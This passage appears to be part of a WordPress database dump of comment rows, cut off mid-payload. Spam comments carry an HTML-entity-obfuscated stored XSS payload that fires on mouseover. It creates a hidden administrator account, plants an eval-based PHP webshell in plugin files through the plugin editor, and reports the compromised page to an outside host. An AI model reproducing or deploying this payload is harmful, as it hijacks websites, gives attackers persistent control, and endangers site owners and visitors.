4;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(151, 1, 'Luo', 'vpdwddmd@gmail.com', 'http://www.facebook.com/pwinllhapnte2e', '160.16.124.138', '2015-11-12 14:16:07', '2015-11-12 14:16:07', 'Hi nice ar fGwb<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#